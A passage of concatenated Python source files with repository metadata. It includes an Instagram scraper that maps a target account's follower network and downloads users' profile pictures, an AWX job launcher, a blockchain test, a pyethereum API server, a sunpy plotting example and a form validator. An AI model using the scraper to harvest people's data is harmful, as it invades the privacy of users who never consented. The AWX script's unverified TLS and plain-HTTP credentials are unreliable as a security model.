print(infoFollower)
if self.checkIfInDB(followerID) == False:
print("Wird eingetragen")
followersIntoDB.append(infoFollower)
c.executemany('insert into userData (instaID, username, fullName, profilPicUrl, isPrivate, scraped, fromMainUser,picDownload,picNeeded) values (?,?,?,?,?,?,?,?,?)', followersIntoDB)#Speichert jedes Listen element der LISTE followerIntoDB in die Datenbank
conn.commit()
conn.close()
def checkIfInDB(self,instaID):
conn = sqlite3.connect(self.dbName)
print(instaID)
c = conn.cursor()
checkSQL = c.execute("""SELECT dbID FROM userData WHERE instaID = ?""", (instaID,))
checkIfInSQL = c.fetchone()
conn.close() # Vielleicht muss hier oben noch ein commit hin NICHT SICHER
if checkIfInSQL == None:
return False #Wenn False zurück gegeben wird ist der USER NICHT DRIN
print("Schon vorhanden in userData")
return True
def createDatabase(self):
dbName = str(int(time.time()))+'.db'
conn = sqlite3.connect(dbName)
c = conn.cursor()
c.execute('''CREATE TABLE userData
(dbID INTEGER PRIMARY KEY AUTOINCREMENT,instaID text, username text, fullName text, profilPicUrl text, mediaCount INTEGER, followerCount INTEGER, followingsCount INTEGER, isPrivate BOOLEAN, scraped BOOLEAN, fromMainUser BOOLEAN, picDownload BOOLEAN, picNeeded BOOLEAN)''') # Noch foreign key und datatypes anpassen
c.execute('''CREATE TABLE whoFollowsWho
(beingFollowed INTEGER, follower INTEGER , FOREIGN KEY(beingFollowed) REFERENCES userData(dbID), FOREIGN KEY(follower) REFERENCES userData(dbID))''') # Noch foreign key und datatypes anpassen
conn.commit()
conn.close()
self.dbName = dbName
return dbName
def startingProcess(self,username,mode=0,maxList=30): #Gathers base data to make further data aggregation possible (based on the given user)
#Datenbank erstellen
print("DB erstellt")
self.createDatabase()
# Erst eigenen User in die DB eintragen
print("Main user fetched")
self.getMainUserData(username=username)
if mode == 0:
print("Checking Followers")
self.listMostRecentFollowers(username=username,maxInList=maxList)
elif mode == 1:
print("Checking Followings")
self.listMostRecentFollowing(username=username,maxInList=maxList)
else:
print("Not an available mode!")
    def getAllUsers(self, mode=0, maxList=30):
        """Scrape relations for every first-level user not yet scraped.

        mode 0 -> followers, mode 1 -> followings. Sleeps 3 seconds between
        users to ease rate limiting.
        """
        conn = sqlite3.connect(self.dbName)
        c = conn.cursor()
        c.execute("""SELECT instaID FROM userData WHERE scraped = False AND fromMainUser = True""")
        notScraped = c.fetchall()
        print(notScraped)
        for userID in notScraped:  # each row is a 1-tuple (instaID,)
            print(userID)
            if mode == 0:
                print("Checking Followers")
                print(userID[0])
                self.listMostRecentFollowers(userID=userID[0], maxInList=maxList)
            elif mode == 1:
                print(userID[0])
                print("Checking Followings")
                self.listMostRecentFollowing(userID=userID[0], maxInList=maxList)
            else:
                print("Not an available mode!")
            sleep(3)
        conn.close()
def postProcessing(self):
conn = sqlite3.connect(self.dbName)
c = conn.cursor()
c.execute("""UPDATE userData SET fromMainUser = ?""",(True,))
conn.commit()
conn.close()
    def fromScratch(self,username,modeMain=0,modeFollowers=0,maxMainUser=30,maxSecondaryUser=30):
        """End-to-end run: log in, build a new DB seeded from *username*,
        flag the seed rows, then scrape every collected user.

        modeMain / modeFollowers: 0 = followers, 1 = followings.
        maxMainUser / maxSecondaryUser: per-user list size limits.
        """
        self.login(force=False,two_step_verificator=True)
        sleep(2)
        self.startingProcess(username,modeMain,maxMainUser)
        print("Basics abgeschlossen")
        self.postProcessing()
        self.getAllUsers(modeFollowers,maxSecondaryUser)
    def furtherAggregate(self,dbName,mode=0,maxSecondary=30):
        """Resume scraping against an existing database file."""
        self.dbName = dbName
        self.getAllUsers(mode,maxSecondary)
    def getPhotoData(self):
        """Download the profile picture of every user that still needs one.

        Selects rows flagged picNeeded and not yet picDownload, saves each
        picture under the row's dbID, and commits per row so an interrupted
        run can resume. Sleeps 0-3 s between downloads to avoid rate limits.
        """
        conn = sqlite3.connect(self.dbName)
        c = conn.cursor()
        c.execute("""SELECT dbID,profilPicUrl FROM userData WHERE picDownload = False AND picNeeded = True""")
        profilPicUrls = c.fetchall()
        for picURL in profilPicUrls:
            print(picURL)
            self.downloadProfilePicture(picURL[1],str(picURL[0]))
            # Mark the row immediately so a crash does not redo the download.
            c.execute("""UPDATE userData SET picDownload = ? WHERE dbID = ?""",(True,picURL[0],))
            conn.commit()
            rand = random.randint(0,3)
            sleep(rand)
        conn.close()
    def setDbName(self,dbName):
        """Point this client at an existing database file."""
        self.dbName = dbName
    def imageProcessing(self):
        """Turn every downloaded picture in ./pictures into a 150x150
        circular avatar with a transparent background ("<name>Alpha.png").
        """
        def crop_max_square(pil_img):
            # Largest centered square that fits inside the image.
            return crop_center(pil_img, min(pil_img.size), min(pil_img.size))
        def crop_center(pil_img, crop_width, crop_height):
            # Crop a crop_width x crop_height box centered in the image.
            img_width, img_height = pil_img.size
            return pil_img.crop(((img_width - crop_width) // 2,
                                 (img_height - crop_height) // 2,
                                 (img_width + crop_width) // 2,
                                 (img_height + crop_height) // 2))
        def mask_circle_transparent(pil_img, blur_radius, offset=0):
            # Apply a blurred circular alpha mask to the image.
            offset = blur_radius * 2 + offset
            mask = Image.new("L", pil_img.size, 0)
            draw = ImageDraw.Draw(mask)
            draw.ellipse((offset, offset, pil_img.size[0] - offset, pil_img.size[1] - offset), fill=255)
            mask = mask.filter(ImageFilter.GaussianBlur(blur_radius))
            result = pil_img.copy()
            result.putalpha(mask)
            return result
        path = os.getcwd()
        print(path)
        # NOTE: Windows-style separators — this only works on Windows.
        fullPath = path + "\\pictures\\"
        liste = os.listdir(fullPath)
        for pic in liste:
            im = Image.open(fullPath + pic)
            # im.thumbnail((150,150))
            # im.save(fullPath+pic.split(".")[0]+'NEWNEW.png', "png")
            im_square = crop_max_square(im).resize((150, 150), Image.LANCZOS)
            im_thumb = mask_circle_transparent(im_square, 4)
            im_thumb.save(fullPath + pic.split(".")[0] + 'Alpha.png')
    def additionalUserInfo(self):
        """Fetch media/followings/follower counts for users whose pictures
        are needed (not every stored user gets the extra API calls).

        Results are collected in memory first and written to the DB in a
        second pass, so a failed API call aborts fetching but keeps what
        was already gathered.
        """
        conn = sqlite3.connect(self.dbName)
        c = conn.cursor()
        # followerCount IS NULL marks rows that have not been enriched yet.
        c.execute("""SELECT instaID FROM userData WHERE picNeeded = True AND followerCount IS NULL""")
        profileIDs = c.fetchall()
        additionalInfo = {}
        print(profileIDs)
        for profileID in profileIDs:
            try:
                print(profileID[0])
                # Uses the module-level `instagram` client, not self.
                account = instagram.get_account_by_id(profileID[0])
                rand = random.randint(0, 3)
                sleep(rand)
                additionalInfo[profileID[0]] = [account.media_count,account.follows_count,account.followed_by_count]
            except Exception:
                # Stop on the first error (rate limit/network) but still
                # persist everything collected so far.
                print("BROKEN")
                break
        for Info in additionalInfo:
            print(Info)
            c.execute("""UPDATE userData SET mediaCount = ?, followingsCount = ?, followerCount = ? WHERE instaID = ?""", (additionalInfo[Info][0],additionalInfo[Info][1],additionalInfo[Info][2], Info,))
            conn.commit()
        conn.close()
    # NOTE: This function is most likely not entirely correct yet and still needs improvement.
    # It has not been tested so far.
    def ClearFolder(self):
        """Delete the processed avatars from ./pictures.

        Heuristic: files produced by imageProcessing() end in "Alpha.png",
        so the character five places from the end is a letter, while raw
        downloads are presumably named by their numeric dbID (digit there)
        — TODO confirm this naming assumption.
        """
        path = os.getcwd()
        print(path)
        # NOTE: Windows-style separators — this only works on Windows.
        fullPath = path + "\\pictures\\"
        liste = os.listdir(fullPath)
        for pic in liste:
            if pic[-5].isalpha():
                os.remove(fullPath + pic)
# Script driver: build the client, scrape, then render the network graph.
instagram = ModifiedInsta()
instagram.with_credentials(MAINUSERNAME, MAINPASSWORD)
#First Parameter MainUser. 2nd Parameter Followers/Followings
instagram.fromScratch("INSTAGRAMUSER",0,1,100,100)#Pass 0 to check most recent followers, pass 1 for most recent followings
##instagram.furtherAggregate("EXISTINGDB.db",0,30) #Keep collecting data using existing database
#instagram.setDbName("1586871777.db")
dataObject = DataAnalysis(instagram.dbName)
dataObject.networkGraphText(1,1) #Not all pictures are being downloaded to save time
instagram.getPhotoData() #downloads profile pictures of needed users
instagram.imageProcessing() #Adds the alpha channel to profile pictures
# If an int is passed as the 2nd parameter, every follower with
# connections <= that threshold is dropped from the graph (default 0 so nobody is lost).
dataObject.networkGraph(1,1)# (0,0)/(1,0) -> mode=0; (1,1)/(0,1) -> mode=1 -> database structure changes based on the parameters given before graphing
#instagram.additionalUserInfo() #Gets follower-,follwings- and mediacount for all necessary users
#instagram.ClearFolder()
f564a32f841736ace4058831d6040dc6be3337f5 | 4,414 | py | Python | task-library/ansible/AwxRunPlaybook.py | mlavi/blueprints | b4aca2f11acc39b11b11819e6d123fc243a61c95 | [
"MIT"
] | 60 | 2018-08-06T23:44:54.000Z | 2022-03-02T21:21:30.000Z | task-library/ansible/AwxRunPlaybook.py | mlavi/blueprints | b4aca2f11acc39b11b11819e6d123fc243a61c95 | [
"MIT"
] | 16 | 2018-12-10T10:56:31.000Z | 2021-11-23T08:12:10.000Z | task-library/ansible/AwxRunPlaybook.py | mlavi/blueprints | b4aca2f11acc39b11b11819e6d123fc243a61c95 | [
"MIT"
] | 95 | 2018-09-14T15:03:35.000Z | 2021-12-21T10:45:19.000Z | # region headers
# escript-template v20190605 / stephane.bourdeaud@nutanix.com
# * author: jose.gomez@nutanix.com
# * version: 20200218
# task_type: Execute
# task_name: LaunchJobTemplate
# description: Launch a job template or also known playbook
# endregion
# region capture Calm variables
# * Capture variables here. This makes sure Calm macros are not referenced
# * anywhere else in order to improve maintainability.
awx_username = '@@{awx.username}@@'
awx_password = '@@{awx.secret}@@'
awx_api = '@@{awx_ip}@@'
awx_job_template_id = int('@@{awx_job_template_id}@@')
awx_extra_vars = "" #@@{awx_extra_vars}@@
host_ip = '@@{address}@@'
# endregion
# region functions
def make_api_call(url, method, username, username_secret, payload=None):
    """Makes an API call to an external API.

    The previous version wrapped this in a `while True` loop that could
    never iterate twice (every path returns or exits); the loop has been
    removed with identical behavior: one attempt, failure exits the script.

    Args:
        url: The URL for the external REST API endpoint.
        method: The REST method to use.
        username: The API user name.
        username_secret: The API user name password.
        payload: The JSON payload to include in the call.

    Returns:
        The API response on success; exits with status 1 on HTTP failure
        (after printing the request/response details).
    """
    headers = {
        'Content-Type': 'application/json',
        'Accept': 'application/json'
    }
    print("Making a {} API call to {}".format(method, url))
    if payload:
        resp = urlreq(
            url,
            verb=method,
            auth='BASIC',
            user=username,
            passwd=username_secret,
            params=json.dumps(payload),
            headers=headers,
            verify=False
        )
    else:
        resp = urlreq(
            url,
            verb=method,
            auth='BASIC',
            user=username,
            passwd=username_secret,
            headers=headers,
            verify=False
        )
    # deal with the result/response
    if resp.ok:
        return resp
    print("Request failed")
    print("Headers: {}".format(headers))
    print("Payload: {}".format(json.dumps(payload)))
    print('Status code: {}'.format(resp.status_code))
    print('Response: {}'.format(
        json.dumps(
            json.loads(resp.content),
            indent=4)))
    exit(1)
def awx_run_job_template(api,username,password,job_template_id,host_ip,extra_vars=None):
    """Launch an AWX job template limited to this VM and wait for it.

    NOTE: this module uses Python 2 print statements (Calm eScript).
    NOTE(review): host_ip is unused — "limit" uses the Calm @@{address}@@
    macro instead; confirm which was intended.
    NOTE(review): awx_poll_job returns normally after a failed job, so the
    'successful' log below may be printed even on failure — confirm.
    """
    # region prepare api call
    # Form method, url and headers for the API call
    api_port = "80"
    api_endpoint = "/api/v2/job_templates/"
    api_action = "/launch/"
    url = "http://{}:{}{}{}{}".format(
        api,
        api_port,
        api_endpoint,
        job_template_id,
        api_action
    )
    method = "POST"
    payload = {
        "extra_vars": extra_vars,
        "limit": "@@{address}@@"
    }
    r = make_api_call(
        url,
        method,
        username,
        password,
        payload
    )
    if r.ok:
        job_id = json.loads(r.content)['job']
        print 'Ansible Job ID: {0}'.format(job_id)
        awx_poll_job(api,username,password,job_id)
        print 'Ansible job status: successful'
    else:
        print 'Request failed', r.content
        exit(1)
def awx_poll_job(api,username,password,job_id):
    """Poll an AWX job every 10 s (up to 360 tries, i.e. 1 h) until it is
    'successful'.

    NOTE(review): on a 'failed'/'error' status this only prints and breaks,
    returning normally — the caller cannot tell failure from success.
    Confirm whether exiting non-zero here was intended.
    """
    # region prepare api call
    # Form method, url and headers for the API call
    api_port = "80"
    api_endpoint = "/api/v2/jobs/"
    url = "http://{}:{}{}{}/".format(
        api,
        api_port,
        api_endpoint,
        job_id,
    )
    method = "GET"
    retries = 360
    job_status = ''
    while job_status != 'successful':
        r = make_api_call(
            url,
            method,
            username,
            password,
        )
        if r.ok:
            job_status = json.loads(r.content)['status']
            if job_status == "failed" or job_status == "error":
                print "Ansible job failed"
                break
        else:
            print 'Post request failed', r.content
            exit(1)
        sleep(10)
        retries -= 1
        if retries == 0:
            # if job hasn't finished yet, give up
            print 'Job may still running. Increase the retries or sleep time'
            exit(0)
# endregion
# Script entry point: launch the template and block until the job finishes.
awx_run_job_template(awx_api,awx_username,awx_password,awx_job_template_id,host_ip,awx_extra_vars)
56bf57afa8b9026780a40663435a2b6223eccba0 | 4,774 | py | Python | suites/Operations/CommitteeMember/CommitteeFrozenBalanceWithdraw.py | echoprotocol/pytests | 5dce698558c2ba703aea03aab79906af1437da5d | [
"MIT"
] | 1 | 2021-03-12T05:17:02.000Z | 2021-03-12T05:17:02.000Z | suites/Operations/CommitteeMember/CommitteeFrozenBalanceWithdraw.py | echoprotocol/pytests | 5dce698558c2ba703aea03aab79906af1437da5d | [
"MIT"
] | 1 | 2019-11-19T12:10:59.000Z | 2019-11-19T12:10:59.000Z | suites/Operations/CommitteeMember/CommitteeFrozenBalanceWithdraw.py | echoprotocol/pytests | 5dce698558c2ba703aea03aab79906af1437da5d | [
"MIT"
] | 2 | 2019-04-29T10:46:48.000Z | 2019-10-29T10:01:03.000Z | # -*- coding: utf-8 -*-
import time
from common.base_test import BaseTest
from project import INIT0_PK, REQUIRED_DEPOSIT_AMOUNT, UNFREEZE_DURATION_SECONDS
import lemoncheesecake.api as lcc
from lemoncheesecake.matching import check_that, equal_to
# Suite metadata read by the lemoncheesecake test runner.
SUITE = {
    "description": "Operation 'committee_frozen_balance_withdraw'"
}
@lcc.prop("main", "type")
@lcc.tags("operations", "committee_member_operations", "committee_frozen_balance_withdraw")
@lcc.suite("Check work of operation 'committee_frozen_balance_withdraw'", rank=1)
class CommitteeFrozenBalanceWithdraw(BaseTest):
    """End-to-end check of 'committee_frozen_balance_withdraw': freeze a
    deposit for the first active committee member, then withdraw the
    surplus above REQUIRED_DEPOSIT_AMOUNT and verify the remaining balance.
    """
    def __init__(self):
        super().__init__()
        self.__database_api_identifier = None
        self.init0 = None
    def setup_suite(self):
        """Connect to the node and cache the first active committee member."""
        super().setup_suite()
        self._connect_to_echopy_lib()
        lcc.set_step("Setup for {}".format(self.__class__.__name__))
        self.__database_api_identifier = self.get_identifier("database")
        lcc.log_info("API identifiers are: database='{}'".format(self.__database_api_identifier))
        self.committee_members_info = self.get_active_committee_members_info(self.__database_api_identifier)
        self.init0 = self.committee_members_info[0]["account_id"]
        self.committee_member_id = self.committee_members_info[0]["committee_id"]
        lcc.log_info(
            "Echo initial accounts: {}, initial committee id: {}".format(self.init0, self.committee_member_id)
        )
    def teardown_suite(self):
        """Disconnect from the node."""
        self._disconnect_to_echopy_lib()
        super().teardown_suite()
    @lcc.test("Simple work of operation 'committee_frozen_balance_withdraw'")
    def method_main_check(self):
        """Deposit twice the required amount, then withdraw the surplus."""
        amount_to_freeze = REQUIRED_DEPOSIT_AMOUNT * 2
        lcc.set_step("Check active committee member frozen balance")
        response_id = self.send_request(
            self.get_request("get_committee_frozen_balance", [self.committee_member_id]), self.__database_api_identifier
        )
        current_frozen_balance = self.get_response(response_id)["result"]["amount"]
        lcc.log_info("{} account, has frozen balance amount: {}".format(self.init0, current_frozen_balance))
        if int(current_frozen_balance) <= REQUIRED_DEPOSIT_AMOUNT:
            lcc.log_info("Not enought asset to withdraw frozen balance")
        # Deposit so the balance exceeds the required minimum and a
        # withdrawal becomes possible.
        lcc.set_step("Freeze asset of committee_member: '{}' account".format(self.init0))
        operation = self.echo_ops.get_committee_frozen_balance_deposit_operation(
            echo=self.echo,
            committee_member=self.committee_member_id,
            committee_member_account=self.init0,
            amount=amount_to_freeze,
            asset_id=self.echo_asset,
            signer=INIT0_PK
        )
        collected_operation = self.collect_operations(operation, self.__database_api_identifier)
        broadcast_result = self.echo_ops.broadcast(echo=self.echo, list_operations=collected_operation)
        if not self.is_operation_completed(broadcast_result, expected_static_variant=0):
            raise Exception("Balance is not freezed")
        response_id = self.send_request(
            self.get_request("get_committee_frozen_balance", [self.committee_member_id]), self.__database_api_identifier
        )
        current_frozen_balance = self.get_response(response_id)["result"]["amount"]
        lcc.log_info(
            "Account {} frozen balance updated, frozen balance amount: {}".format(self.init0, current_frozen_balance)
        )
        withdraw_amount = current_frozen_balance - REQUIRED_DEPOSIT_AMOUNT
        lcc.set_step("Withdraw balance of active committee member")
        # Wait until the freeze period has elapsed before withdrawing.
        time.sleep(UNFREEZE_DURATION_SECONDS + 1)
        operation = self.echo_ops.get_committee_frozen_balance_withdraw_operation(
            echo=self.echo,
            committee_member_account=self.init0,
            amount=withdraw_amount,
            asset_id=self.echo_asset,
            signer=INIT0_PK
        )
        collected_operation = self.collect_operations(operation, self.__database_api_identifier)
        broadcast_result = self.echo_ops.broadcast(echo=self.echo, list_operations=collected_operation)
        if not self.is_operation_completed(broadcast_result, expected_static_variant=0):
            raise Exception("Balance is not withdrawn")
        lcc.log_info("Committee member balance have been withdrawn")
        lcc.set_step("Check that frozen balance have been withdrawn")
        response_id = self.send_request(
            self.get_request("get_committee_frozen_balance", [self.committee_member_id]), self.__database_api_identifier
        )
        frozen_balance_after_withdraw = self.get_response(response_id)["result"]["amount"]
        check_that("frozen balance", frozen_balance_after_withdraw, equal_to(REQUIRED_DEPOSIT_AMOUNT))
| 48.222222 | 120 | 0.718266 |
ed99f11782aa6a67cefddb241f49db65b57cee73 | 4,214 | py | Python | pyethereum/apiserver.py | mrmayfield/pyethereum | 6a3cad803f256b012d5a3c6a254c214f9ebe815d | [
"MIT"
] | 1 | 2015-11-05T19:27:58.000Z | 2015-11-05T19:27:58.000Z | pyethereum/apiserver.py | mrmayfield/pyethereum | 6a3cad803f256b012d5a3c6a254c214f9ebe815d | [
"MIT"
] | null | null | null | pyethereum/apiserver.py | mrmayfield/pyethereum | 6a3cad803f256b012d5a3c6a254c214f9ebe815d | [
"MIT"
] | null | null | null | import logging
import threading
import json
import bottle
from pyethereum.chainmanager import chain_manager
from pyethereum.peermanager import peer_manager
import pyethereum.dispatch as dispatch
from pyethereum.blocks import block_structure
import pyethereum.signals as signals
from pyethereum.transactions import Transaction
logger = logging.getLogger(__name__)
base_url = '/api/v0alpha'  # URL prefix shared by every route in this module
app = bottle.Bottle()
app.config['autojson'] = True  # let bottle JSON-encode dict responses
class ApiServer(threading.Thread):
    """Daemon thread that serves the REST API through bottle/waitress."""

    def __init__(self):
        super(ApiServer, self).__init__()
        self.daemon = True
        self.listen_host = '127.0.0.1'
        self.port = 30203

    def configure(self, config):
        """Read listen host/port from the [api] section of *config*."""
        self.listen_host = config.get('api', 'listen_host')
        self.port = config.getint('api', 'listen_port')

    def run(self):
        # Wrap the bottle app so every response carries CORS headers.
        wrapped = CorsMiddleware(app)
        bottle.run(wrapped, server='waitress', host=self.listen_host, port=self.port)
# ###### create server ######
api_server = ApiServer()
@dispatch.receiver(signals.config_ready)
def config_api_server(sender, config, **kwargs):
    # Apply the [api] host/port settings as soon as configuration is loaded.
    api_server.configure(config)
# #######cors##############
class CorsMiddleware:
    """WSGI wrapper that answers OPTIONS pre-flight requests directly and
    appends CORS headers to every other response."""

    HEADERS = [
        ('Access-Control-Allow-Origin', '*'),
        ('Access-Control-Allow-Methods', 'GET, POST, OPTIONS'),
        ('Access-Control-Allow-Headers',
         'Origin, Accept, Content-Type, X-Requested-With, X-CSRF-Token')
    ]

    def __init__(self, app):
        self.app = app

    def __call__(self, environ, start_response):
        if environ["REQUEST_METHOD"] != "OPTIONS":
            # Delegate to the wrapped app, extending its headers on the way out.
            def cors_start_response(status, headers, exc_info=None):
                headers.extend(CorsMiddleware.HEADERS)
                return start_response(status, headers, exc_info)
            return self.app(environ, cors_start_response)
        # Pre-flight request: reply ourselves with an empty body.
        start_response('200 OK', CorsMiddleware.HEADERS + [('Content-Length', "0")])
        return ""
# ######### Utilities ########
def load_json_req():
    """Return the JSON payload of the current bottle request, decoding the
    raw body when bottle did not already parse it."""
    payload = bottle.request.json
    return payload if payload else json.load(bottle.request.body)
# ######## Blocks ############
def make_blocks_response(blocks):
    """Serialize blocks into JSON-safe dicts, hex-encoding binary fields
    per the block_structure schema."""
    serialized = []
    for blk in blocks:
        data = blk.to_dict()
        for field_name, field_type, _ in block_structure:
            if field_type in ("bin", "trie_root"):
                data[field_name] = data[field_name].encode('hex')
        serialized.append(data)
    return dict(blocks=serialized)
@app.get(base_url + '/blocks/')
def blocks():
    """Return the 20 most recent blocks of the chain."""
    logger.debug('blocks/')
    return make_blocks_response(chain_manager.get_chain(start='', count=20))
@app.get(base_url + '/blocks/<blockhash>')
def block(blockhash=None):
    """Return the block with the given hex hash, or 404."""
    logger.debug('blocks/%s', blockhash)
    # NOTE: str.decode('hex') is Python 2 only.
    blockhash = blockhash.decode('hex')
    if blockhash in chain_manager:
        # NOTE(review): chain_manager.get() looks like it returns a single
        # block while make_blocks_response iterates its argument — confirm.
        return make_blocks_response(chain_manager.get(blockhash))
    else:
        return bottle.abort(404, 'No block with id %s' % blockhash)
# ######## Transactions ############
@app.put(base_url + '/transactions/')
def transactions():
    """Accept a hex-serialized transaction, announce it locally, and
    redirect to its resource URL."""
    # request.json FIXME / post json encoded data? i.e. the representation of
    # a tx
    hex_data = bottle.request.body.read()
    logger.debug('PUT transactions/ %s', hex_data)
    tx = Transaction.hex_deserialize(hex_data)
    signals.local_transaction_received.send(sender=None, transaction=tx)
    return bottle.redirect(base_url + '/transactions/' + tx.hex_hash())
# ######## Accounts ############
@app.get(base_url + '/accounts/')
def accounts():
    """List accounts (not implemented yet)."""
    logger.debug('accounts')
    pass
@app.get(base_url + '/accounts/<address>')
def account(address=None):
    """Show a single account (not implemented yet)."""
    logger.debug('account/%s', address)
    pass
# ######## Peers ###################
def make_peers_response(peers):
    """Serialize (ip, port, node_id) triples, hex-encoding the node id."""
    return dict(peers=[
        dict(ip=ip, port=port, node_id=node_id.encode('hex'))
        for (ip, port, node_id) in peers
    ])
@app.get(base_url + '/peers/connected')
def connected_peers():
    """Peers with a currently open connection."""
    return make_peers_response(peer_manager.get_connected_peer_addresses())
@app.get(base_url + '/peers/known')
def known_peers():
    """All peers this node has heard about."""
    return make_peers_response(peer_manager.get_known_peer_addresses())
| 28.093333 | 78 | 0.649027 |
ae73feb3ab30e10e49f6953f48e42dc5eee83b4a | 870 | py | Python | test/test_interface.py | inexio/thola-client-python | f9a6812885738e33b1aed43ca55335b71e3d2b2d | [
"BSD-2-Clause"
] | 1 | 2021-12-28T18:53:52.000Z | 2021-12-28T18:53:52.000Z | test/test_interface.py | inexio/thola-client-python | f9a6812885738e33b1aed43ca55335b71e3d2b2d | [
"BSD-2-Clause"
] | null | null | null | test/test_interface.py | inexio/thola-client-python | f9a6812885738e33b1aed43ca55335b71e3d2b2d | [
"BSD-2-Clause"
] | null | null | null | # coding: utf-8
"""
Thola
REST API for Thola. For more information look at our Github : https://github.com/inexio/thola # noqa: E501
OpenAPI spec version: 1.0.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import unittest
import thola_client
from thola_client.models.interface import Interface # noqa: E501
from thola_client.rest import ApiException
class TestInterface(unittest.TestCase):
    """Unit test stubs for the generated Interface model."""

    def setUp(self):
        pass

    def tearDown(self):
        pass

    def testInterface(self):
        """Test Interface"""
        # FIXME: construct object with mandatory attributes with example values
        # model = thola_client.models.interface.Interface()  # noqa: E501
        pass
# Allow running this test module directly.
if __name__ == '__main__':
    unittest.main()
| 21.219512 | 112 | 0.683908 |
062c3c035844b5adf510331716119627f40f017e | 4,156 | py | Python | examples/plotting/hmi_cutout.py | fluxtransport/sunpy | 351d3edca97e779179f367670292c95574c7a222 | [
"BSD-2-Clause"
] | null | null | null | examples/plotting/hmi_cutout.py | fluxtransport/sunpy | 351d3edca97e779179f367670292c95574c7a222 | [
"BSD-2-Clause"
] | null | null | null | examples/plotting/hmi_cutout.py | fluxtransport/sunpy | 351d3edca97e779179f367670292c95574c7a222 | [
"BSD-2-Clause"
] | null | null | null | """
====================
HMI Showcase: Cutout
====================
This example demonstrates how to plot a cutout region of a `~sunpy.map.Map`
with connector lines that indicate the region of interest in the full-disk
image.
Since this example deals with the creation of a specific style of image, there
are multiple lines that deal directly with matplotlib axes.
"""
import matplotlib.colors
import matplotlib.pyplot as plt
from matplotlib.patches import ConnectionPatch
import astropy.units as u
from astropy.coordinates import SkyCoord
import sunpy.map
from sunpy.data.sample import HMI_LOS_IMAGE
##############################################################################
# First, we use the sample HMI LOS image and focus the cutout over an active
# region near the solar center.
# Load the sample HMI LOS image; rotate() aligns solar north with the top.
magnetogram = sunpy.map.Map(HMI_LOS_IMAGE).rotate()
left_corner = SkyCoord(Tx=-142*u.arcsec, Ty=50*u.arcsec, frame=magnetogram.coordinate_frame)
right_corner = SkyCoord(Tx=158*u.arcsec, Ty=350*u.arcsec, frame=magnetogram.coordinate_frame)
##############################################################################
# We clean up the magnetogram by masking off all data that is beyond the solar
# limb.
hpc_coords = sunpy.map.all_coordinates_from_map(magnetogram)
mask = ~sunpy.map.coordinate_is_on_solar_disk(hpc_coords)
magnetogram_big = sunpy.map.Map(magnetogram.data, magnetogram.meta, mask=mask)
##############################################################################
# We create the figure in two stages. From here on, the rest of the comments
# will be inside the code block.
# The first stage is plotting the full-disk magnetogram.
fig = plt.figure(figsize=(7.2, 4.8))
# We create a nice normalization range for the image
norm = matplotlib.colors.SymLogNorm(50, vmin=-7.5e2, vmax=7.5e2)
# Plot the full-disk magnetogram
ax1 = fig.add_subplot(121, projection=magnetogram_big)
magnetogram_big.plot(axes=ax1, cmap='RdBu_r', norm=norm, annotate=False,)
magnetogram_big.draw_grid(axes=ax1, color='k', alpha=0.25, lw=0.5)
# These lines deal with hiding the axis, its ticks and labels
for coord in ax1.coords:
    coord.frame.set_linewidth(0)
    coord.set_ticks_visible(False)
    coord.set_ticklabel_visible(False)
# We draw the rectangle around the region we plan to showcase in the cutout image.
magnetogram_big.draw_rectangle(left_corner, top_right=right_corner, color='k', lw=1)
# The second stage is plotting the zoomed-in magnetogram.
magnetogram_small = magnetogram.submap(left_corner, top_right=right_corner)
ax2 = fig.add_subplot(122, projection=magnetogram_small)
im = magnetogram_small.plot(axes=ax2, norm=norm, cmap='RdBu_r', annotate=False,)
ax2.grid(alpha=0)
# Unlike the full-disk image, here we just clean up the axis labels and ticks.
lon, lat = ax2.coords[0], ax2.coords[1]
lon.frame.set_linewidth(1)
lat.frame.set_linewidth(1)
lon.set_axislabel('Helioprojective Longitude',)
lon.set_ticks_position('b')
lat.set_axislabel('Helioprojective Latitude',)
lat.set_axislabel_position('r')
lat.set_ticks_position('r')
lat.set_ticklabel_position('r')
# Now for the finishing touches, we add two lines that will connect
# the two images as well as a colorbar.
# Each ConnectionPatch runs from a corner of the cutout axes (axes
# fraction) to the matching rectangle corner in full-disk pixel coords.
xpix, ypix = magnetogram_big.world_to_pixel(right_corner)
con1 = ConnectionPatch(
    (0, 1), (xpix.value, ypix.value), 'axes fraction', 'data', axesA=ax2, axesB=ax1,
    arrowstyle='-', color='k', lw=1
)
xpix, ypix = magnetogram_big.world_to_pixel(
    SkyCoord(right_corner.Tx, left_corner.Ty, frame=magnetogram_big.coordinate_frame))
con2 = ConnectionPatch(
    (0, 0), (xpix.value, ypix.value), 'axes fraction', 'data', axesA=ax2, axesB=ax1,
    arrowstyle='-', color='k', lw=1
)
ax2.add_artist(con1)
ax2.add_artist(con2)
# Place a horizontal colorbar directly above the cutout axes.
pos = ax2.get_position().get_points()
cax = fig.add_axes([
    pos[0, 0], pos[1, 1]+0.01, pos[1, 0]-pos[0, 0], 0.025
])
cbar = fig.colorbar(im, cax=cax, orientation='horizontal')
# For the colorbar we want it to have three fixed ticks
cbar.locator = matplotlib.ticker.FixedLocator([-1e2, 0, 1e2])
cbar.set_label("LOS Magnetic Field [gauss]", labelpad=-40, rotation=0)
cbar.update_ticks()
cbar.ax.xaxis.set_ticks_position('top')
plt.show()
| 38.12844 | 93 | 0.713426 |
4132600bc865bcd7ef0fd0c1221153aff3bbd3a0 | 439 | py | Python | price_picker/views/main/validators.py | M0r13n/price_picker | aaa4e79496753bc3b61afbde6324868ee5c46aa5 | [
"MIT"
] | 3 | 2019-08-03T16:52:36.000Z | 2020-04-13T10:06:38.000Z | price_picker/views/main/validators.py | M0r13n/price_picker | aaa4e79496753bc3b61afbde6324868ee5c46aa5 | [
"MIT"
] | null | null | null | price_picker/views/main/validators.py | M0r13n/price_picker | aaa4e79496753bc3b61afbde6324868ee5c46aa5 | [
"MIT"
] | 1 | 2021-01-02T11:31:25.000Z | 2021-01-02T11:31:25.000Z | from wtforms.validators import ValidationError
from price_picker.models import CouponCode
class CouponCodeValidator(object):
    """WTForms validator that rejects coupon codes absent from the database."""

    def __init__(self, message=None):
        # Default German error text shown to the user.
        self.message = 'Ungültiger Code.' if message is None else message

    def __call__(self, form, field):
        match = CouponCode.query.filter_by(code=field.data).first()
        if not match:
            raise ValidationError(self.message)
| 29.266667 | 66 | 0.683371 |
